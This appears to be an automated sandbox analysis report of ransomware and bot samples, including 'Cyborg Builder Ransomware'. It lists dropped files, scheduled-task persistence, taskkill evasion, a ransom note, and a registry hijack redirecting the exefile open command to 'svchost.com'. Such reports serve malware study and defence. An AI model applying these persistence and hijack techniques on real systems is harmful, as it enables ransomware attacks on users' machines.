File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-256.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\merge-styles\lib-commonjs\IRawStyleBase.js.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\NewsAppList.targetsize-32.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\System.Net.WebSockets.Client.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.38.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-64_altform-lightunplated.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\merge-styles\lib\IKeyframes.js.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2XML.XSL.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Getstarted_10.2.41172.0_neutral_~_8wekyb3d8bbwe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-400.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlMiddleCircleHover.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\ui-strings.js.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\pwahelper.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\prism_d3d.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\javap.exe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\view.html.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Light.scale-200.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ul-phn.xrm-ms.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\msedgeupdateres_uk.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-30_altform-unplated.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\PesterThrow.ps1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.targetsize-36_altform-unplated.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\it\System.Windows.Forms.resources.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-180.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\XLSTART.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-400.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_contrast-black.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Java\jre-1.8\legal\jdk.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\mshwLatin.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\WinSxS\wow64_microsoft-windows-audio-callcontrol_31bf3856ad364e35_10.0.22000.376_none_30ba6bbc91270e3c\f\CallButtons.ProxyStub.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~zh-TW~10.0.22000.493.mum.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..terprises.resources_31bf3856ad364e35_10.0.22000.493_el-gr_bbb98f1767db1d63.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-security-credssp_31bf3856ad364e35_10.0.22000.318_none_bf30385626ae2dae\credssp.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\r\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\cs-CZ.json.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-i..l-keyboard-00000404_31bf3856ad364e35_10.0.22000.1_none_3eda577b6825da8f.manifest.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-ngc-popkeysrv_31bf3856ad364e35_10.0.22000.282_none_cc435a260c3d2b52\f\ngcpopkeysrv.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-smbserver-v2_31bf3856ad364e35_10.0.22000.348_none_d54430917bb23076\f.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_b563dd17654ea05f\cmstplua.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\msil_microsoft.windows.a...commands.resources_31bf3856ad364e35_10.0.22000.348_it-it_0b886f0e11c5ce37.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\Packages\Microsoft-Windows-DirectoryServices-ADAM-Snapins-Admin-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-embedded-shelllauncher_31bf3856ad364e35_10.0.22000.120_none_3fbde764cc71982b\WESL_ShellLauncher_uninstall.mof.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\r.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-black\windows.iconsize.details.svg.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\assembly\GAC_32\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\diagnostics\system\Bluetooth\TS_Main.ps1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_10.0.22000.132_de-de_756c0b2000ab34ff\f.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_10.0.22000.348_lt-lt_34c0164794a89822.manifest.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..iagnostic.resources_31bf3856ad364e35_10.0.22000.120_th-th_b16776f8926eb568\f\RS_ChangeProcessorState.psd1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_netfx-aspnet_webadmin_providers_b03f5f7f11d50a3a_10.0.22000.1_none_c81c5f94819d7e78\ManageConsolidatedProviders.aspx.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-web-app-host.resources_31bf3856ad364e35_10.0.22000.348_ko-kr_65df44f99c125960\WWAHost.exe.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-ie-timeline_31bf3856ad364e35_11.0.22000.1_none_7ae67646211b62e1\Timeline.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..em-ppipro.resources_31bf3856ad364e35_10.0.22000.493_zh-tw_691e7b2407404874.manifest.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Composition-Core-Package~31bf3856ad364e35~amd64~lv-LV~10.0.22000.184.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-b..buggertransport-usb_31bf3856ad364e35_10.0.22000.1_none_f3c147410f507b43.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_hyperv-vmemulatednic.resources_31bf3856ad364e35_10.0.22000.1_en-us_69800c7fabcd1071.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-w..owsupdatediagnostic_31bf3856ad364e35_10.0.22000.1_none_d30b4b92822a82a9\cl_windowsupdate.ps1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\Manifests\amd64_hyperv-compute-gues..teservice.resources_31bf3856ad364e35_10.0.22000.1_en-us_e569506b8fe9ebf7.manifest.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-i..-ccshared.resources_31bf3856ad364e35_10.0.22000.1_en-us_bde7d8093b1c0cb9.manifest.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-t..icesframework-msctf_31bf3856ad364e35_10.0.22000.282_none_7b3eae3ca88232d7\msctf.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\Boot\Fonts.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..rs-keyboard-desktop_31bf3856ad364e35_10.0.22000.71_none_54a6cc49708e2d95.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-l..me-ppipro.resources_31bf3856ad364e35_10.0.22000.493_zh-cn_5acb849c8a0efcf1\f\license.rtf.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\inclusive-common.css.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\FileMaps\$$_speech_onecore_engines_85d79caefa9ac893.cdf-ms.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-ie-offlinefavorites_31bf3856ad364e35_11.0.22000.1_none_f5b5a5c8f5bd43d7.manifest.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-lcphrase-tbl_31bf3856ad364e35_10.0.22000.1_none_3526bc3a759d37ea.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\Packages\HyperV-Compute-Storage-merged-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Assets\Logo.scale-100.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\appObjectFactory.js.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-white\NoDetailsOrPreview.svg.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_winusb.inf.resources_31bf3856ad364e35_10.0.22000.1_en-us_55bcfd207a63126d.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-n..s-package.resources_31bf3856ad364e35_10.0.22000.120_uk-ua_c197e01452d7b8e1\f\LocalizationData.psd1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\Packages\HyperV-HvSocket-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-dafaspinfraprovider_31bf3856ad364e35_10.0.22000.1_none_057e048ea6323b5c.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-g..tallation.resources_31bf3856ad364e35_10.0.22000.1_en-us_f671ae4b278d3a1e\appmgmts.dll.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-scripting-chakra_31bf3856ad364e35_11.0.22000.318_none_028e8a48890a0434.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\Manifests\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.22000.1_es-mx_3f28231c958e225b.manifest.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_10.0.22000.132_it-it_ab07aa42b9b42e49\f\CloudContent.adml.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-web-app-host.resources_31bf3856ad364e35_10.0.22000.348_es-mx_95a76a97eb16683a\f\WWAHost.exe.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-f..back-courtesyengine_31bf3856ad364e35_10.0.22000.282_none_74f07f6d49ae70dd\f.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\r\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\kn-IN.json.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft.windows.powershell.v3.wsman_31bf3856ad364e35_10.0.22000.1_none_50e44306802cb22a\Microsoft.WSMan.Management.psd1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-Server-AppCompat-FoD-Package~31bf3856ad364e35~amd64~gl-ES~10.0.22000.282.mum.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-UserDeviceRegistration-Package~31bf3856ad364e35~amd64~ar-SA~10.0.22000.258.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\ssprerror-main.html.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-wmiv2provider_31bf3856ad364e35_10.0.22000.1_none_7d961686cedc995c\Test-NetConnection.psm1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\Packages\Microsoft-Windows-WindowsMediaPlayer-Troubleshooters-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\StoreLogo.contrast-white_scale-100.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-white\windows.showdesktop.svg.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lockapp.appxmain_31bf3856ad364e35_10.0.22000.348_none_e2c7a9ab59285812.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..component.resources_31bf3856ad364e35_10.0.22000.120_et-ee_766bb08343013170\f.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_startupapp-task-data_31bf3856ad364e35_10.0.22000.1_none_9acb42b11a41d6f0.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\WinSxS\amd64_netfx4-mscorpe_dll_b03f5f7f11d50a3a_4.0.15806.0_none_8a5f7fe0cdd16f1a.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\TEMPSP~1.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Users\Admin\Desktop\5.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Users\Admin\Desktop\6.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
N/A N/A C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Users\Admin\Desktop\7.exe N/A
N/A N/A C:\Users\Admin\Desktop\7.exe N/A
